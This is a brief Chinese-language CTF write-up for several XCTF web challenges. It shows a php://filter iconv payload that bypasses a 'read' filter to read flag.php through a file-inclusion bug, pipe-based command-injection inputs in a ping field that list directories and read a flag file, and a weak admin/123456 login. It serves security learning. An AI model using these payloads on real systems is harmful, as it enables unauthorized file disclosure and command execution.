攻防世界web篇(五)

简介: 攻防世界web篇(五)

攻防世界web篇(五)

文件包含

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

首先尝试测试

经过尝试后发现read被ban掉了,这里参考了一下官方的wp

UCS-4*

UCS-4BE

UCS-4LE*

UCS-2

UCS-2BE

UCS-2LE

UTF-32*

UTF-32BE*

UTF-32LE*

UTF-16*

UTF-16BE*

UTF-16LE*

UTF-7

UTF7-IMAP

UTF-8*

ASCII*

EUC-JP*

SJIS*

eucJP-win*

SJIS-win*

\具体支持的编码可见php官方文档

\https://www.php.net/manual/zh/mbstring.supported-encodings.php

利用iconv进行编码

/?filename=php://filter/convert.iconv.UTF-7.UCS-4*/resource=flag.php

command_execution

127.0.0.1 |ls /home

127.0.0.1  | cat /home/flag.txt

weak_auth

小宁写了一个登陆验证页面,随手就设了一个密码。

账号密码admin/123456

相关文章
|
5月前
|
SQL 监控 安全
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
攻防世界---baby_web
攻防世界---baby_web
|
7月前
|
数据安全/隐私保护
攻防世界web-----easyupload
攻防世界web-----easyupload
|
4月前
|
存储 PHP 数据安全/隐私保护
攻防世界 Web_php_unserialize
攻防世界 Web_php_unserialize
78 0
|
5月前
|
SQL 安全 Java
Java Web应用的安全防护与攻防深度剖析
Java Web应用的安全防护与攻防深度剖析
|
5月前
|
SQL 监控 安全
Java Web应用的安全防护与攻防策略
Java Web应用的安全防护与攻防策略
攻防世界---web---warmup
攻防世界---web---warmup
攻防世界---web---warmup
|
7月前
|
数据库
攻防世界---web---NewsCenter
攻防世界---web---NewsCenter
|
7月前
|
SQL 开发框架 .NET
攻防世界---web---supersqli
攻防世界---web---supersqli
|
7月前
|
PHP
攻防世界---Web_php_include
攻防世界---Web_php_include